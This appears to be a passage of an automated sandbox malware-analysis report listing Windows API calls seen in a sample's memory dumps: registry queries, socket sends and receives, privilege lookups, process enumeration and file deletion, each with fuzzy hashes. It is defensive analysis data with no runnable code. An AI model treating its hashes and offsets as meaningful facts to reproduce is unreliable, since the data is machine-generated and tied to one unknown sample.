              • API String ID: 428220571-0
              • Opcode ID: 7cef1fedc959230371945a9b8b6626b150fdc65de18e2f44893a7ecd07623004
              • Instruction ID: cae5656a0138ccbafe6ae18003c026a6b9119502e40400ce7c06d95c86f46fd6
              • Opcode Fuzzy Hash: 7cef1fedc959230371945a9b8b6626b150fdc65de18e2f44893a7ecd07623004
              • Instruction Fuzzy Hash: 9621C77550E3C06FD3138B258C51B62BFB8EF47620F0981CBE8848B593D165A919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 057D0353
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: d320ba5562483abeb36227b4567735a3e3fe3d8d58583da70cc4dae5edd1182a
              • Instruction ID: ea190d2c9788200f7fe92c66c0b1f87d6b9cb6c6727ba901ae5cb6ff25185f5e
              • Opcode Fuzzy Hash: d320ba5562483abeb36227b4567735a3e3fe3d8d58583da70cc4dae5edd1182a
              • Instruction Fuzzy Hash: E821A371009380AFE7228F21DC45FA6FFB8EF06310F0884DAE9848B193D265A949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • OpenFileMappingW.KERNELBASE(?,?), ref: 057D20AD
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileMappingOpen
              • String ID:
              • API String ID: 1680863896-0
              • Opcode ID: f2012fd77fb23eb74bef5116bd3e6aab0a3d95ccce2eac65ea5fc82a457f7333
              • Instruction ID: 01934a0b14f8f4a8d7a8472ac4d8cadf9677ccba564147bcb3e76f94c52e1a54
              • Opcode Fuzzy Hash: f2012fd77fb23eb74bef5116bd3e6aab0a3d95ccce2eac65ea5fc82a457f7333
              • Instruction Fuzzy Hash: 2A2171B1509380AFE721CB25DC45F66FFA8EF05310F18849AE9858B252D375E505CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0985
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 4b7b314daa29663f48cb5531ea59e4255a5ea7e0d20209138692d17d97b1416d
              • Instruction ID: a252ab58ed9b6191e5d66b72105ad611ffc8b462edaf6b2e33e4792cd07a19b8
              • Opcode Fuzzy Hash: 4b7b314daa29663f48cb5531ea59e4255a5ea7e0d20209138692d17d97b1416d
              • Instruction Fuzzy Hash: F521F8B65087846FE7138B25DC44FA6BFB8EF46720F0880DAED849B153D224A905C7B1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSARecv.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2D66
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Recv
              • String ID:
              • API String ID: 4192927123-0
              • Opcode ID: 717df6e0e22e13607ea31f15efe189371dc3020a4d6d48d01ca4a0ba486eefd3
              • Instruction ID: 9d021d1ffd52b680424d610fde70d7984869a82079f6c944a300e074c4e0de1a
              • Opcode Fuzzy Hash: 717df6e0e22e13607ea31f15efe189371dc3020a4d6d48d01ca4a0ba486eefd3
              • Instruction Fuzzy Hash: 3A2181B2404344AFEB228F65DD44FA7FFB8EF45310F04849AE9859B152D234E509CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSASocketW.WS2_32(?,?,?,?,?), ref: 057D194E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Socket
              • String ID:
              • API String ID: 38366605-0
              • Opcode ID: 8ce7fd654895602132904c04579b88bbb62063feff039ae63014590e2e039884
              • Instruction ID: ce67ff1c7bbc94aa10f9ffa3f189b8a48641c4dc6956f1edc56311702a7f9e75
              • Opcode Fuzzy Hash: 8ce7fd654895602132904c04579b88bbb62063feff039ae63014590e2e039884
              • Instruction Fuzzy Hash: 92218D71509780AFE722CF65DC49F66FFB8EF05310F08899EE9858B652D375A408CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 057D0899
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 863884e94a8831ae0011eda6a2da2a19e4fbde4e5eb64f529ef88169847290aa
              • Instruction ID: 08f8435f12c947022ef45af867cf827323fdefd2827b82710486c7e57f927fb0
              • Opcode Fuzzy Hash: 863884e94a8831ae0011eda6a2da2a19e4fbde4e5eb64f529ef88169847290aa
              • Instruction Fuzzy Hash: 10218E71500700AFE721DF65DC48B66FBE8FF08310F04846AE9858B652E375E404DBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 057D045E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: a0ddf4cbb886863049db3e4a70dd7fc47c23931ba8bafd9702b8a929a748b0ad
              • Instruction ID: d09a24a54b1dbcda53c27220f4688dec66d86f7a810056cbccde035c1478f8c0
              • Opcode Fuzzy Hash: a0ddf4cbb886863049db3e4a70dd7fc47c23931ba8bafd9702b8a929a748b0ad
              • Instruction Fuzzy Hash: 8721F272100304AFEB31CF15DC84FB6FBACEF04310F04885AEE858A181E6B4A449CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0A51
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: be3fdb3d8ea7009de2d682d11ea7f2d32854a9c6dd9387e63d5efbd1c0d5a81d
              • Instruction ID: 0897e0fed423c5b05917a91580743c468bbb933596e71caee02041e9e603d5b7
              • Opcode Fuzzy Hash: be3fdb3d8ea7009de2d682d11ea7f2d32854a9c6dd9387e63d5efbd1c0d5a81d
              • Instruction Fuzzy Hash: D8219072409380AFE7228F25DC44F56BFB8EF46314F08849BE9849B153C224A809CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 014BAAB1
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 6846797dfa932a6093f15d0cfbbbd5b10439498efda7eb86da6260a0fbd905a1
              • Instruction ID: bcdb9abd1a897e80cc19fa39c94e905bb8b4a70d8c33945b70d7b902fc12b9a1
              • Opcode Fuzzy Hash: 6846797dfa932a6093f15d0cfbbbd5b10439498efda7eb86da6260a0fbd905a1
              • Instruction Fuzzy Hash: E921CF72500304AEE721CE59CD84FABFBECEF08320F14841AE9419B652E674E5098AB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 057D019D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 7f4fc0fc9e29b0777d6a4024738b5a2a2dbbb8923b2abab5ef063db1f582c23c
              • Instruction ID: 07df65275c6954ae16dff27a7f24bd44b28b149f547e9b4ac5f2f0f356ba3844
              • Opcode Fuzzy Hash: 7f4fc0fc9e29b0777d6a4024738b5a2a2dbbb8923b2abab5ef063db1f582c23c
              • Instruction Fuzzy Hash: E9219F71604340AFE720DF69DC89B6AFBE8EF04310F04846AED458B681E775E504CA71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateDirectoryW.KERNELBASE(?,?), ref: 057D079F
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateDirectory
              • String ID:
              • API String ID: 4241100979-0
              • Opcode ID: 78bf707eb6562fb4f1d9f1ef15f1b95259f37b881267fb09d0ef4fffffff6939
              • Instruction ID: 8d1a0c870fd81d1a6e8a0518ac27838d21cfa3190edadafbbcc26a6c9315f4bb
              • Opcode Fuzzy Hash: 78bf707eb6562fb4f1d9f1ef15f1b95259f37b881267fb09d0ef4fffffff6939
              • Instruction Fuzzy Hash: B92171725093809FDB51CB25DC48B56BFF8EF06214F0984EAE885CF652E224D949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 057D0F9B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 6b101ba6d6454ea0a6b6cdb5e6f3752b1d64f5f77c13f11c0198f2f65aa3efe6
              • Instruction ID: 83c9247c323f90cd2a98ed7ed5ac59a865424379e67253c430e6cf51cef98d8f
              • Opcode Fuzzy Hash: 6b101ba6d6454ea0a6b6cdb5e6f3752b1d64f5f77c13f11c0198f2f65aa3efe6
              • Instruction Fuzzy Hash: 9A21C3715053846FE7218B25DC85FA6FFA8EF05320F18809AFD459B192D2A4A949CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 014BABB4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 879e28d3f697aa412e2b8019a1e59f133a3dac85d03e28d19a2914d90af7b664
              • Instruction ID: 9bcaf236576b625c9191e34028d6ef17116cce0ea705bdad9dfe293e019fc0e8
              • Opcode Fuzzy Hash: 879e28d3f697aa412e2b8019a1e59f133a3dac85d03e28d19a2914d90af7b664
              • Instruction Fuzzy Hash: 50216F72604304AFE721CE19CC84FA7FBECEF04710F14885AEA458B652D674E404CA71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • OpenFileMappingW.KERNELBASE(?,?), ref: 057D20AD
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileMappingOpen
              • String ID:
              • API String ID: 1680863896-0
              • Opcode ID: 20c8e43d8fb3c65af8372fb0a8bd219d5b67a672a9bbe19f98da4c6b1aa024b0
              • Instruction ID: 3fbe010d2ec1b62ddcb6fe89fdbc1a8dae1dd83f572f09d0783acd1b7bd77faf
              • Opcode Fuzzy Hash: 20c8e43d8fb3c65af8372fb0a8bd219d5b67a672a9bbe19f98da4c6b1aa024b0
              • Instruction Fuzzy Hash: 7021AEB5504340AFE721DF29CD85B66FBA8EF04320F18846AED468B242D675E405CA71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D13EC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: f9af814ef95bd2ee9d59fb2a8d1fa0e84ba7e88cdbcf450b5b7868748f399fc8
              • Instruction ID: 9256192f079e8626fe9b87f6e5a97418e989d22eac81cbe6a8fa7b959435ce93
              • Opcode Fuzzy Hash: f9af814ef95bd2ee9d59fb2a8d1fa0e84ba7e88cdbcf450b5b7868748f399fc8
              • Instruction Fuzzy Hash: 842181725093C05FDB128B25DC54B92BFB4AF07224F0984DAEC858F663D2649948CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileView
              • String ID:
              • API String ID: 3314676101-0
              • Opcode ID: 8847150c699bc1f50f63a4f1101add2ea8af7787c819e1573da1691b67a5ff6d
              • Instruction ID: 5d8b3ad080910e9a6b64e29621adbe7d5100b535aa717fad3a3b2e0aeaa62eb9
              • Opcode Fuzzy Hash: 8847150c699bc1f50f63a4f1101add2ea8af7787c819e1573da1691b67a5ff6d
              • Instruction Fuzzy Hash: BF21CD72500340AFE721CF19CC85FAAFBE8EF08320F04845AEA858B642D276A409CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • K32EnumProcesses.KERNEL32(?,?,?,B4FCE2B2,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 057D14A6
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: EnumProcesses
              • String ID:
              • API String ID: 84517404-0
              • Opcode ID: 2a2e659bd5f772303592a078d482617c62f6c94874e2afd0a0a9589d060b7fe0
              • Instruction ID: 4b7391d6ee25a2624067724f37f3a5f5266c4272e177f06a275ee12ab1a1f1f6
              • Opcode Fuzzy Hash: 2a2e659bd5f772303592a078d482617c62f6c94874e2afd0a0a9589d060b7fe0
              • Instruction Fuzzy Hash: EE214F715093849FD722CB65DC84B92BFF4EF06210F0984EAE985CF162D224A908CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSASend.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2C72
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Send
              • String ID:
              • API String ID: 121738739-0
              • Opcode ID: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction ID: 3d58545e5ae1843ece320089873e6f925b64a06b1e08dddaf133445618883e1e
              • Opcode Fuzzy Hash: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction Fuzzy Hash: 83117272500304AFEB21CF65DD44FA6FBA8EF08320F04886AED459B556D674E505CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSASocketW.WS2_32(?,?,?,?,?), ref: 057D194E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Socket
              • String ID:
              • API String ID: 38366605-0
              • Opcode ID: ef58362876006dd97f8ddf8b3e1cb2419538ecd1a2d3cc8188c9f851743989fb
              • Instruction ID: 2fc418e8857f03bfd5a781e93b1f93f975d2b2fcbb44fe00fc02f9e59b442e98
              • Opcode Fuzzy Hash: ef58362876006dd97f8ddf8b3e1cb2419538ecd1a2d3cc8188c9f851743989fb
              • Instruction Fuzzy Hash: BA219D71500740AFEB21CF65DD49B66FBA9EF08320F04886AE9858B652D375A404CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D055C
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: d8504dabb7a7220a1f6b0e723caae01fc2f220487871b5218f64c63e9d05268c
              • Instruction ID: 461da399698682fba941f291f79a7e1b3d6699190ecd84bbc115da91e1356cba
              • Opcode Fuzzy Hash: d8504dabb7a7220a1f6b0e723caae01fc2f220487871b5218f64c63e9d05268c
              • Instruction Fuzzy Hash: AF117F72500704AFEB21CE16DC84F66FBE8EF04720F04845AED469B656E664E444DB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 057D11B2
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 21e8ff7c7dad825e886200f3d564c11ae82b16ff3f994d99afb0096fbcb74b22
              • Instruction ID: 7968219897bde7dcce3816b180c72cc4bd48cc700b675cd74ead1b64cf2b7824
              • Opcode Fuzzy Hash: 21e8ff7c7dad825e886200f3d564c11ae82b16ff3f994d99afb0096fbcb74b22
              • Instruction Fuzzy Hash: 2C112E725093809FD721CB65DC85B56FFE8EF05210F0884AAED45CB652D275E844CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2A79
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: 6f312bc6d3a7d8cb012da4151a872baf8935c5530389c49b9ed9fc03bdbae1df
              • Instruction ID: 0a05a699b69fe97e1200b10c3ccba515902ee8e60bcb4021ea6b8c77a79a5d67
              • Opcode Fuzzy Hash: 6f312bc6d3a7d8cb012da4151a872baf8935c5530389c49b9ed9fc03bdbae1df
              • Instruction Fuzzy Hash: BE11D075500304AFEB31CF55DC84FA6FBA8EF44320F14846AED458B246D238E409CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetProcessTimes.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D260D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ProcessTimes
              • String ID:
              • API String ID: 1995159646-0
              • Opcode ID: 48e28af8b98015f6846fd8fc142e0c1227ea2e49f6f8965e4a8216c7cf0a2e0d
              • Instruction ID: 6235259a4a4493d4f7155fddca476c091c7e6e792b6175e03fa650de284ce00d
              • Opcode Fuzzy Hash: 48e28af8b98015f6846fd8fc142e0c1227ea2e49f6f8965e4a8216c7cf0a2e0d
              • Instruction Fuzzy Hash: D611C472500304AFEB21CF65DC85FAAFBA8EF04320F14846AED459B656D675E405CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetExitCodeProcess.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0EAC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CodeExitProcess
              • String ID:
              • API String ID: 3861947596-0
              • Opcode ID: 59353f239af6c5dcac1be8a509bd2e5cc977a441d019408b316d23c3a24fb0ea
              • Instruction ID: 31dea742d91e5479dbc88b3a0d4f20bb201e43004e842ee4eed7ef6aa25de670
              • Opcode Fuzzy Hash: 59353f239af6c5dcac1be8a509bd2e5cc977a441d019408b316d23c3a24fb0ea
              • Instruction Fuzzy Hash: 3811A371500304AFEB21DF29DD85BABFBA8EF04320F14846AED45DB645E674E404CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BA58A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 5b52f069c6cbe38425d60ac5cc89b5bcd4dd63d02d6dd883e1b67b08fdf493f4
              • Instruction ID: ff296711cabd27c47f7b02fc9ccd8bc40a5b8342a551e126cf3ef7527e05d6a1
              • Opcode Fuzzy Hash: 5b52f069c6cbe38425d60ac5cc89b5bcd4dd63d02d6dd883e1b67b08fdf493f4
              • Instruction Fuzzy Hash: 40117F72409380AFDB228F55DC44B62FFF4EF4A220F08849AED858B663D375A518DB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SendMessageW.USER32(?,?,?,?), ref: 014BB841
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 0c237e56b830b7d3993bae8e3be1f82bd1b3710360bb0454a22b0646799d5630
              • Instruction ID: d32f316d3f59698f4b16a37963b7a55bff9265cb0e4da5b0cda2e2a255fc9631
              • Opcode Fuzzy Hash: 0c237e56b830b7d3993bae8e3be1f82bd1b3710360bb0454a22b0646799d5630
              • Instruction Fuzzy Hash: F6218E724097C09FDB238B25DC50A92BFB0EF07214F0D84DAEDC54F263D265A958DB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 057D0F9B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 13b8c46fdb95c72376e452c6beb879ef6ecf0c46de868eb5013c102855f4f9a2
              • Instruction ID: 20b8e6263d6e9e91ae570ad7836554269966c3fc91162abde9728ab82d0c26d3
              • Opcode Fuzzy Hash: 13b8c46fdb95c72376e452c6beb879ef6ecf0c46de868eb5013c102855f4f9a2
              • Instruction Fuzzy Hash: 8211C671600304AFE720DB15DC85FBAFBA8EF04720F28845AED459B685E6B4E545CA72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0A51
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: 3660c0bc92edd57ed90e5f02810aa309fd654e343b8cfbd84534c0efbc87e9c9
              • Instruction ID: dbac43ea1198c863f2c40aa756bbf7d9843cdf797cb7f5bb33045a088181e779
              • Opcode Fuzzy Hash: 3660c0bc92edd57ed90e5f02810aa309fd654e343b8cfbd84534c0efbc87e9c9
              • Instruction Fuzzy Hash: CD119172501304AFEB21CF55DC45FA6FBA8EF44720F14846AED499B656D278E404CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 057D0353
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 51bb84add1fd28628d48e121b57ddad95e58f8ed7b3f62170954ba5aa5011b4e
              • Instruction ID: 076ec16494436a50388dbaffcea6c72cf8166a66b249a1e5efc6bc2c99219828
              • Opcode Fuzzy Hash: 51bb84add1fd28628d48e121b57ddad95e58f8ed7b3f62170954ba5aa5011b4e
              • Instruction Fuzzy Hash: FC11C171500304AFEB31CF15DC85F66FFA8EF04720F14849EED454A696D2B5A548CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 014BBBB9
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 65f7813623d4f1a0021adc29c6970b933c4ab4e12ea0820b99d7888870c92fb4
              • Instruction ID: d3990a448b6108dd1c1aef6569f37d328e1fa6a465dc0e2420e2b3fe96465fee
              • Opcode Fuzzy Hash: 65f7813623d4f1a0021adc29c6970b933c4ab4e12ea0820b99d7888870c92fb4
              • Instruction Fuzzy Hash: 2611B135409380AFD7228F25CC85B52FFB4EF06220F0884DEED858B663D275A458CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DispatchMessageW.USER32(?), ref: 014BBE70
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: e0dc32393c160ad31910be764699bc60bdf13cbf21cacf534ab4657b8dd87238
              • Instruction ID: 872913e518f9674fc060c10c193e457f64b402ac500e9ca84475f59ab4ab612b
              • Opcode Fuzzy Hash: e0dc32393c160ad31910be764699bc60bdf13cbf21cacf534ab4657b8dd87238
              • Instruction Fuzzy Hash: D5113A754093C4AFD7238B259C84B62BFA4DF47624F0984DAED858F263D2756848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateIconFromResourceEx.USER32 ref: 014BB78A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: f9654f101b2a8af659fbc71fb1d634d17579c17e979e84851835745fd9e76ee5
              • Instruction ID: 68e4dc5a1581bdcb4cab37e853dad9351fcb37c1c3f428a32f71b23be42ba662
              • Opcode Fuzzy Hash: f9654f101b2a8af659fbc71fb1d634d17579c17e979e84851835745fd9e76ee5
              • Instruction Fuzzy Hash: 34117272409384AFDB228F55DC84B92FFF4EF49310F09859EED858B562C375A458CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetSystemInfo.KERNELBASE(?), ref: 057D1044
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InfoSystem
              • String ID:
              • API String ID: 31276548-0
              • Opcode ID: 585a2c8808f56f4e314dabb3b50a7058396557044400c5579900efd784907717
              • Instruction ID: 7c05a2bb39cf61781fab6e9471649a909c4335b9045280befa2ff29376cd1e01
              • Opcode Fuzzy Hash: 585a2c8808f56f4e314dabb3b50a7058396557044400c5579900efd784907717
              • Instruction Fuzzy Hash: F4116D714093C49FD7128B25DC84B92FFB4EF06224F0984EBED858F163C279A849CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 014BBF0C
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 51100b1c495a964586b7438ac4b19f27604cf9cb118961439f25ac52b87ce7a6
              • Instruction ID: e8abd80e63d6a82d3951fb96df3d857b98808b36c473c03c07f0157c872b0ad9
              • Opcode Fuzzy Hash: 51100b1c495a964586b7438ac4b19f27604cf9cb118961439f25ac52b87ce7a6
              • Instruction Fuzzy Hash: 08118F725053809FD711CF29DC85B96BFE8EF05220F0884AAED45CF262D274E848CB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 057D11B2
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6ff16ade124bf339ca0381d6bacf77d39beae174ed4f354080fb81bb187e07fe
              • Instruction ID: 6a2097aee2caea89e994f05f5be974b45c6000e21d66524ae96cf495a8de8e56
              • Opcode Fuzzy Hash: 6ff16ade124bf339ca0381d6bacf77d39beae174ed4f354080fb81bb187e07fe
              • Instruction Fuzzy Hash: 8A115272A043009FEB60CF69D845B66FBE8EF04320F48C46ADD45CB646E675D444DA71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateDirectoryW.KERNELBASE(?,?), ref: 057D079F
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateDirectory
              • String ID:
              • API String ID: 4241100979-0
              • Opcode ID: ab0ec356ce7a67bf86713da2d6ed6f430715f068ece10507a8474bfcc57d7e19
              • Instruction ID: f8702dd1e5293d0a5d4742acfb9f71c47dd34e76d193eee0fa0490883f929d60
              • Opcode Fuzzy Hash: ab0ec356ce7a67bf86713da2d6ed6f430715f068ece10507a8474bfcc57d7e19
              • Instruction Fuzzy Hash: 35115E756042449FDBA0CF6AD888B66FBE8EF04220F0884AADD49CF646E674E444CF71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0985
